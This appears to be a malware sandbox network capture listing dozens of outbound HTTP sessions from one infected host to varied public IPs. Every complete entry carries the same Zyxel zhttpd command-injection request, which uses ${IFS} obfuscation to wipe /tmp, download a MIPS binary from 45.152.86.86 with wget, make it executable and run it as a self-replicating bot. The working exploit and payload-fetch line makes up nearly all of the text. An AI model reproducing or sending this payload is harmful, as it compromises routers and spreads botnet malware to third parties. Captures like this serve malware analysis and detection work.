                              Mar 31, 2024 08:41:51.134707928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6915192.168.2.1335708111.211.1.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.134747028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6916192.168.2.1347326109.164.116.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.134766102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6917192.168.2.135808296.240.137.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.134805918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6918192.168.2.133600823.213.35.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.134835005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6919192.168.2.1337840203.74.109.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.134896040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6920192.168.2.1347404160.188.86.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.134938955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6921192.168.2.1346734122.151.199.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.134969950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6922192.168.2.1358006198.52.15.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.135014057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6923192.168.2.1335434196.48.68.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.135047913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6924192.168.2.135931834.120.181.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.135109901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6925192.168.2.1345424133.238.137.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.135147095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6926192.168.2.1355010186.92.57.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.135205984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6927192.168.2.1360152210.17.254.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.135241985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6928192.168.2.1338588144.61.62.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.135270119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6929192.168.2.1359232124.249.83.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.135317087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6930192.168.2.133918036.122.126.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.135364056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6931192.168.2.135135660.206.183.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.135401011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6932192.168.2.1347130205.17.212.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.135427952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6933192.168.2.1345922217.221.248.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.135463953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6934192.168.2.135424087.215.20.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.135521889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6935192.168.2.1333464149.219.176.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.135561943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6936192.168.2.135671027.236.233.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.135600090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6937192.168.2.135369893.152.82.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.135634899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6938192.168.2.1335962112.202.125.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.135662079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6939192.168.2.1349912126.213.122.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.135720968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6940192.168.2.1346782204.248.71.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.135761023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6941192.168.2.1336174145.103.238.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.135781050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6942192.168.2.1342660142.105.217.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.135814905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6943192.168.2.1355302212.206.40.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.135878086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6944192.168.2.1337130105.87.155.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.135921001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6945192.168.2.1335672168.7.74.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.135960102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6946192.168.2.1347828156.119.14.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.136022091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6947192.168.2.1344454116.94.169.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.136055946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6948192.168.2.1347420108.109.102.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.136090994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6949192.168.2.1357448124.56.6.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.136137009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6950192.168.2.1342074205.84.3.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.136173964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6951192.168.2.135807880.61.49.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.136226892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6952192.168.2.1334066133.234.53.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.136260033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6953192.168.2.1342090209.64.138.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.136312962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6954192.168.2.1343414190.54.232.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.136359930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6955192.168.2.1358442212.196.220.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.136393070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6956192.168.2.1353702116.247.40.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.136434078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6957192.168.2.134074293.223.177.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.136481047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6958192.168.2.1360526126.181.168.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.136533022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6959192.168.2.1351556110.175.26.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.136567116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6960192.168.2.135830252.188.183.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.136617899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6961192.168.2.1342636208.126.196.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.136646032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6962192.168.2.1338676190.167.160.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.136724949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6963192.168.2.1360070111.73.41.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.136756897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6964192.168.2.135909265.150.17.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.136811972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6965192.168.2.1359978151.181.199.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.136850119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6966192.168.2.1337324147.230.30.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.136878014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6967192.168.2.1337704221.248.198.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.136926889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6968192.168.2.13533742.181.88.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.136981964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6969192.168.2.1355450161.228.53.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.137020111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6970192.168.2.135815252.10.249.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.137057066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6971192.168.2.1339848116.216.175.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.137073994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6972192.168.2.1355262171.129.77.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.137110949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6973192.168.2.135720449.164.227.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.137166977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6974192.168.2.1339090163.185.246.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.137204885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6975192.168.2.134309860.86.154.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.137243032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6976192.168.2.1343564121.79.237.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.137278080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6977192.168.2.135582889.197.183.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.137316942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6978192.168.2.135184237.76.59.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.137350082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6979192.168.2.135755824.187.118.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.137375116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6980192.168.2.1340306108.103.166.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.137447119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6981192.168.2.135072661.33.53.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.137485981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6982192.168.2.135928477.36.153.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.137518883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6983192.168.2.1358918102.144.48.211443
                              TimestampBytes transferredDirectionData
